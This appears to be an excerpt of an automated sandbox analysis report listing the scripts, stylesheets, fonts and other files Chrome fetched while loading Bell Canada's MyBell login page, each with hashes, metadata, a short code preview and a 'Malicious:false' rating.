                                                                                                                                                                                                                                                                                                                                      SHA1:9E9855B8C847B1F87438D036215EE73249CDC0CB
                                                                                                                                                                                                                                                                                                                                      SHA-256:5F5D1984D2DFBC1A5B0B9FA079191FA6C3D0463B84A095EF4389B734A04EBAA9
                                                                                                                                                                                                                                                                                                                                      SHA-512:B9BD99E4C30FA437B5A3F2138CE03DC704A09465A6604871EC1EF147E7B1126ED5323F70E3F381DDDD53FB9F4DDF9BA283E591838458B6A4BF7165F47133AF46
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC8cd32b50cbd048ffb3664f99a7839a96-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC8cd32b50cbd048ffb3664f99a7839a96-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC8cd32b50cbd048ffb3664f99a7839a96-source.min.js', "var consent=_satellite.getVar(\"d_consent\");if(1===consent?.advertising&&\"undefined\"!=typeof gtag){var isPV=_satellite.getVar(\"d_is_pageview\"),_ss1=_satellite.getVar(\"s_SS1\")||\"\",_ss2=_satellite.getVar(\"s_SS2\")||\"\",_aw=\"AW-953414520\",_cf=_satellite.getVar(\"s_cookie_flags\")||\"\";_ss1=_ss1.toLowerCase(),\"smart home\"==(_ss2=_ss2.toLowerCase())&&(_aw=\"AW-1068483847\"),\"mobile\"!=_ss2&&\"cart mobility\"!=_ss2&&\"checkout mobility\"!=_ss2||(_aw=\"AW-1070746166\"),isPV&&gtag(\"config\",_aw,{cookie_flags:_cf,allow_enhanced_conversions:!0})}");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4922), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):4922
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.8599908374944665
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUPmIQ4E4:1DY0hf1bT47OIqWb1ORQ4
                                                                                                                                                                                                                                                                                                                                      MD5:AEE81175682EEC8248E55A1A5A1A52ED
                                                                                                                                                                                                                                                                                                                                      SHA1:CE8A18AEF4B5610952AE7A1EC00DF18516980A28
                                                                                                                                                                                                                                                                                                                                      SHA-256:5F79E941B208F6D866C106893CE45CBE105032993DF293FDB96AD86E258624B1
                                                                                                                                                                                                                                                                                                                                      SHA-512:5FA4ED069E9EB8FE7D71B57EF2E5CA92F1A58E78307690318EDACD38EE3C9BD4387A70EB29B5C7F6E9B0D4BA4DD79BC93220ADF8309337ED1B240E53818F0396
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/953414520/?random=1730380359679&cv=11&fst=1730380359679&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (723)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):7076
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.52488676121649
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:bttd4a6O1T6ahNU3dJ+SrM0hjUYIW2WX8ISlY:bBJ1T9UNJ+SrM0lXV2WXXSlY
                                                                                                                                                                                                                                                                                                                                      MD5:88A2E0A522036C0B87E03552E56629AA
                                                                                                                                                                                                                                                                                                                                      SHA1:EC9D1157518E753A84DBDE1333A29B34CF776D63
                                                                                                                                                                                                                                                                                                                                      SHA-256:788AFB96F2DA68E8729EC35F3D5E381FAD3482D37C54C2195C7311440EE4C27E
                                                                                                                                                                                                                                                                                                                                      SHA-512:44B953878BD650FE2BCC8B6904620955C3E396B7DC8F41F85D021A8E0404DA41DB15C5499A03F7D4FE9129BB340AA3F6782942CF5327502FD4569BEBBB17073F
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/static/service_worker/4al0/sw.js?origin=https%3A%2F%2Fmybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Preview:'use strict';var k=function(a){function b(c){return a.next(c)}function e(c){return a.throw(c)}return new Promise(function(c,d){function f(h){h.done?c(h.value):Promise.resolve(h.value).then(b,e).then(f,d)}f(a.next())})};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;var u,v;a:{for(var x=["CLOSURE_FLAGS"],B=m,C=0;C<x.length;C++)if(B=B[x[C]],B==null){v=null;break a}v=B}var G=v&&v[610401301];u=G!=null?G:!1;var H;const I=m.navigator;H=I?I.userAgentData||null:null;function J(a){return u?H?H.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function K(a){var b;a:{const e=m.navigator;if(e){const c=e.userAgent;if(c){b=c;break a}}b=""}return b.indexOf(a)!=-1};function L(){return u?!!H&&H.brands.length>0:!1}function O(){return L()?J("Chromium"):(K("Chrome")||K("CriOS"))&&!(L()?0:K("Edge"))||K("Silk")};!K("Android")||O();O();!K("Safari")||O()||(L()?0:K("Coast"))||(L()?0:K("Opera"))||(L()?0:K("Edge"))||(L()?J("Microsoft Edge"):K("Edg/"))||L()&
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (854), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):261518
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.069918803310127
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:VneHJLSqucH7CYISDYe2CNCXs2e5fCsI8JFMmvQykz7xY+8rbuq4i:VneHJLSqucHeYSyMA
                                                                                                                                                                                                                                                                                                                                      MD5:B95B20D4C2F4939B055BBE43CC1C5C1F
                                                                                                                                                                                                                                                                                                                                      SHA1:EB76B573531E3C6F9C7DE5E3F9A6B6C63B9C19F0
                                                                                                                                                                                                                                                                                                                                      SHA-256:BE11277FEC5EF3731397D0EABC3D2A212B2FD30CDFCE6BE0618C7645DA21217A
                                                                                                                                                                                                                                                                                                                                      SHA-512:B144F75F58DFB88CDC4D43D240A5B438FE578AD604FA70AF41358DFD351FFBF878B784A2E21C2FC0F68D94FB37D788BA468532E31C36B5F1FAB20B4DB4ABA787
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/css/bell.css?ver=202410310228
                                                                                                                                                                                                                                                                                                                                      Preview:./*Latest update:2024.Jul.16....Rules:..1. Please keep the fonts grouped together at the top of the file...2. Please keep the media queries grouped at the bottom of the file.....BellSlim font*/..@font-face {font-family:'bellslimregular';..src:url('https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_regular-webfont.eot?ver=201701151220');..src:url('https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_regular-webfont.eot??ver=201701151220') format('embedded-opentype'), url('https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_regular-webfont.ttf?ver=201701151220') format('truetype'), url('https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_regular-webfont.svg?ver=201701151220') format('svg');..font-weight:normal;..font-style:normal}..@font-face {font-family:'bellslim_mediumregular';..src:url('https://mybell-qc.akamaized.net/Styles/BRF2/Master/core/fonts/bellslim_medium-webfont.eot?ver=201701151220');..src:url('ht
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):993
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.295033064548282
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:E1vXIbtEHvIYWwmqAK/HJ2cNAXzk5vuHM8aJLtMCRWZ4FhQ:E1vXmtEPT6cLAXzk5kaJL+CwYhQ
                                                                                                                                                                                                                                                                                                                                      MD5:DA6D9261142ADA0AD0C8C737604571A4
                                                                                                                                                                                                                                                                                                                                      SHA1:EC006EEE63E9F85D930EF27E67B1BCA62A8AD8AD
                                                                                                                                                                                                                                                                                                                                      SHA-256:16FB10CD2B09718CDC2D143B223E15C71CB8890C9A07F85DA472BAD0C874B99C
                                                                                                                                                                                                                                                                                                                                      SHA-512:8831DE832B5BFC39E36333F5C836B36EEDC5333192DA409181315CB355AD27E09E80E97FA757E958E2BB79FD3B512957A024A7968E88299CF89AE5B68F9B17BA
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/78fcc867\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"};.if(!YT.loading){YT.loading=1;(function(){var l=[];YT.ready=function(f){if(YT.loaded)f();else l.push(f)};window.onYTReady=function(){YT.loaded=1;var i=0;for(;i<l.length;i++)try{l[i]()}catch(e){}};YT.setConfig=function(c){var k;for(k in c)if(c.hasOwnProperty(k))YTConfig[k]=c[k]};var a=document.createElement("script");a.type="text/javascript";a.id="www-widgetapi-script";a.src=scriptUrl;a.async=true;var c=document.currentScript;if(c){var n=c.nonce||c.getAttribute("nonce");if(n)a.setAttribute("nonce",.n)}var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})()};.
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (387)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):534
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.310902518772589
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApBOSGWidct/BeTrAApBOSGWiIL8LCurKmwOgqPDRWxsM/n:zlFGWcct/BMlFGWGOurKEbRWxs6
                                                                                                                                                                                                                                                                                                                                      MD5:1D8410CA75BAC6F43C19AB0FB0F23796
                                                                                                                                                                                                                                                                                                                                      SHA1:886CF3DEBFE7CB280E359A3DFEFDA2A2AD503F04
                                                                                                                                                                                                                                                                                                                                      SHA-256:FB511A3C94D1480C3EE47DFF3085F23D27EF362F4257F7DE4C9CDE0FDA60C9B9
                                                                                                                                                                                                                                                                                                                                      SHA-512:C36F668321C619B88ACD4F5F76331D32F32172886037692E4A47D83A849A371BB9C6CE66FD9BE41F44E4EBF0A67AE0EFA8ED79C47A7A66BDA99994D9E095D39D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCfaa9cdadad144c4c921b649cd3b62040-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCfaa9cdadad144c4c921b649cd3b62040-source.min.js', "!function(){var e=document.createElement(\"script\");e.type=\"text/javascript\",e.async=!0,e.src=\"//siteimproveanalytics.com/js/siteanalyze_1154.js\";var t=document.getElementsByTagName(\"script\")[0];t.parentNode.insertBefore(e,t)}();");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (27262)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):30953
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.404483058426303
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:eM3+xW4/2+/6/oCeF8wPnzxN2DiBGhLylG4DXYGmB:eMPcU/o182EhLSUGmB
                                                                                                                                                                                                                                                                                                                                      MD5:BD44B299FB6FD5B9A2A3F4F3C080F85C
                                                                                                                                                                                                                                                                                                                                      SHA1:4AB2E75A0C0AA0C6ECD12FED26C502C81506154B
                                                                                                                                                                                                                                                                                                                                      SHA-256:E34FC3965EDB73D7835C318A20B403FCDD6F86269B95B2F9B58A07A3A974F1D8
                                                                                                                                                                                                                                                                                                                                      SHA-512:388D43D87BB57F0143D04660AEB392E0FB419FF6FC9672DCEC6D8CE685366BD5027FC615FB1C151A36D18BB8182CA7C44925FEA8ADD0A197FC60361AADC0762D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/*! pako deflate 1.0.11 with Dojo/ReactJS fix. The fix consists of the forcing of the assignment of the returned object from the call to 't()' to 'window.pako' */.!function(t){self.pako=t()}(function(){return function i(s,h,l){function o(e,t){if(!h[e]){if(!s[e]){var a="function"==typeof require&&require;if(!t&&a)return a(e,!0);if(_)return _(e,!0);var n=new Error("Cannot find module '"+e+"'");throw n.code="MODULE_NOT_FOUND",n}var r=h[e]={exports:{}};s[e][0].call(r.exports,function(t){return o(s[e][1][t]||t)},r,r.exports,i,s,h,l)}return h[e].exports}for(var _="function"==typeof require&&require,t=0;t<l.length;t++)o(l[t]);return o}({1:[function(t,e,a){"use strict";var n="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Int32Array;a.assign=function(t){for(var e,a,n=Array.prototype.slice.call(arguments,1);n.length;){var r=n.shift();if(r){if("object"!=typeof r)throw new TypeError(r+"must be non-object");for(var i in r)e=r,a=i,Object.prototype.hasOwnProperty
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 3536, version 1.0
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):3536
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.919270010806674
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:yh6mw5WIC2uHqDT4mGc0hFOmbEjbZvls8b:yh6mw9wHw4m50XOm8br5
                                                                                                                                                                                                                                                                                                                                      MD5:A88AF0ADFDDF39B1F2E237D3E90A79D7
                                                                                                                                                                                                                                                                                                                                      SHA1:E8334C3FE7DA04B1B41643787BC64E5267E5039C
                                                                                                                                                                                                                                                                                                                                      SHA-256:FA75568A552663CA4A6E43444B2F298C622572DAA2AD78C0D474060EB323436F
                                                                                                                                                                                                                                                                                                                                      SHA-512:B0F81376F9546F1F161820A86B351D6B6C924B7A025F031D93C5F70DE179046189D23650E262B64805A21273813A5C4005FF43731417BFDFF506467E489D7EB8
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/support/Shared/fonts/global-nav-icons.woff2
                                                                                                                                                                                                                                                                                                                                      Preview:wOF2...................z........................?FFTM....`..d.... .N.:..6.$.p. ....."...#.u......n..k.W.........G.B8.>c....P.g ^P..V.!.....K-......H.T...WU^e../2.........-L<...g.%.E..^KkzP..H..../....&v.zl7!...1.;d.*T.9...fC............l....}VR.PQ..6i........o-.K...+.........o..f..*Qy...T. ."......W.k...1.."....c8..T....:......}...d..^7..fN&.[h.P.. .....~.....,.......r.b...T,....2.U.M$.y.-#1..\<{..H.C..|.u].L>..w..........#......^?...<.......H.P3...ab.P.LFCo``..Y.8.x.0./..0.2.eZ&7.Th..e...d..@...)....`3..(..m..S.#"...AUL9.1#.(.6.......A..y.....A.aQ...lVaA/2........V..H.f..Y}Nn...X...b.1..W.\...O..;.D....OV..O.}I[....8M.&t. XE.P..8.X4.Ww....W.T.C......'..R&....t.H\J....i...6}8.u.L..?L.J.Nb..mt_.=(...d..[~..A.%.`...}4c.L.:H../Z.....y.{...b....r....8./.Y.J....XZ|.`.fg..o.?.".g._~[....-S~W8.T.E....w..m..n.}..O.~.s..@i..c.?m..$...m.O.q.=...o?M...`7R. .D....g....US. 1.ss4o"..#L..$..BY..m.6.1R.....2%p..@.o3.....vPE.'..H..&tg.#.oZ`p`+.0....0y..)Z.7...
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):3501
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.383873370647921
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                                                                                                                                                                      MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                                                                                                                                                                      SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                                                                                                                                                                      SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                                                                                                                                                                      SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fmybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):7457
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.762490346864117
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:+rPzVdhy+Y76N66iSt0ih4ipixOi+4ioiUiVi+4iPaP:uE+Y76Nn6ih4ipigi+4ioiUiVi+4iY
                                                                                                                                                                                                                                                                                                                                      MD5:15F7E4A945F98A8CD5DA0CC38E36C138
                                                                                                                                                                                                                                                                                                                                      SHA1:2616367624D8D30E3AAB545327F07E66345AE330
                                                                                                                                                                                                                                                                                                                                      SHA-256:CEF697A926119ED2E9328E84E88E3A42B1987A64256C55066B37DC3F36883515
                                                                                                                                                                                                                                                                                                                                      SHA-512:C1A02E40650BE6BDF8C5FF3606D2219A3528AE2A5A3F9B1052C2A376748266879B667979F11E291A4C4BCAF80AD4A9E125281C69B3EA69EDF0CFAA80440B9164
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/* Latest update: 2016.June.27 */../* Last updated: 2017.June.15 */../* ieDeprecatedBrowserJS js */....navigator.browserDetails = (function(){.. var ua = navigator.userAgent, tem, M = ua.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i) || [];.. if(/trident/i.test(M[1])){.. tem = /\brv[ :]+(\d+)/g.exec(ua) || [];.. return {name:"MSIE",version:(tem[1] || "")};.. }.. if(M[1]=== "Chrome"){.. tem = ua.match(/\b(OPR|Edge)\/(\d+)/);.. if(tem != null) {.. return {name:tem[1].replace("OPR", "Opera"),version:tem[2]};.. }.. }.. M = M[2]? [M[1], M[2]]: [navigator.appName, navigator.appVersion, "-?"];.. tem = ua.match(/version\/(\d+)/i);.. if(tem != null) {.. M.splice(1, 1, tem[1]);.. }.. return {name:M[0],version:M[1]};..}());....// Function triggered when user closes the Deprecated Browser message..function IsBrowserMessageClosedByUser() {.. //alert('IsBrowserMessageClosedByUser');.. setC
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1022)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1169
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.552266327151934
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zlR/ct/BMlRf6EAKA13c2+zxRWd9fGIJGrWeKa355i3LK3z20EONjqxQ:zlR0t/BMlRNvwdlHwWeAbONuxQ
                                                                                                                                                                                                                                                                                                                                      MD5:FAE35161E66F592C900914B3FB5EEA4B
                                                                                                                                                                                                                                                                                                                                      SHA1:71B2A697B17E5D91C5EDCF0C7B0074E5F4A8DD9F
                                                                                                                                                                                                                                                                                                                                      SHA-256:53D1566D6C7E8924A2D493D48ECD4312F9BE28746E480B2BA1C52AA8B4AEADA2
                                                                                                                                                                                                                                                                                                                                      SHA-512:59B9973E4FDD3CC744B459EF352A03E7E4412B8E6BA2CA6DC38659F7899C7760BF375B60F69EAB2B76D6A08F0EED3C28281E666A66A1DD5D75076096DAFEE611
